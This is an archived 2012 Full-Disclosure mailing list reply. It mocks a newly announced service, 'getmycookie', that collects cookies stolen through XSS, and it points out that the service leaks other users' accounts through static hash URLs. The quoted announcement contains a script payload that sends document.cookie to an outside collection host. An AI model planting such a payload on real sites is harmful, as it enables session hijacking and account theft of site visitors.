lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 7 May 2012 02:27:33 +0530
From: karniv0re <karniv0re@...l.co.in>
To: Manu <sourvivor@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [OT] New online service to make XSSs easier

And this is anonymous.. How??

Oh and I was also wondering how come I can see accounts created by other
users, using a static url like so:
http://www.getmycookie.com/view.m3?hash=<insert_hash_here>

Login as anybody and navigate here, to see that you are definitely not in
your own account:
http://www.getmycookie.com/view.m3?hash=bc010e11ae988eca4ea1d98d5c8014138fa0cf9ccaab457094

Regards,
karniv0re

On Mon, May 7, 2012 at 2:02 AM, Manu <sourvivor@...il.com> wrote:

> Hello,
>
> I just would like you to know a new service that I want to publish. Its
> called 'getmycookie' (www.getmycookie.com) and is going to be a service
> to make easier to perform XSS attacks.
>
> The website allow users to store there their extracted data from XSS's.
> For example, if you are a user of getmycookie you could inject a xss as:
>
> <script>document.writr('<img src="
> http://getmycookie.com/hook.m3?hash=8f1c52809a3c3517820727961e277c4d397ba7019258e7a373&value="'
> +  document.cookie + '>');</script>.
>
> It would be stored into a database ('value' parameter) and it could be
> obtained through the control panel of the user that owns the hash
> '8f1c52809a3c3517820727961e277c4d397ba7019258e7a373'. (username: demo,
> password: demo).
>
> Is easy, fast, anonymous and you don't need to give any information about
> you, just an username and password.
>
> Greetings
>
> --
> /Manu~
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Regards,
> Riyaz Walikar
>
>  <http://secunia.com/>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ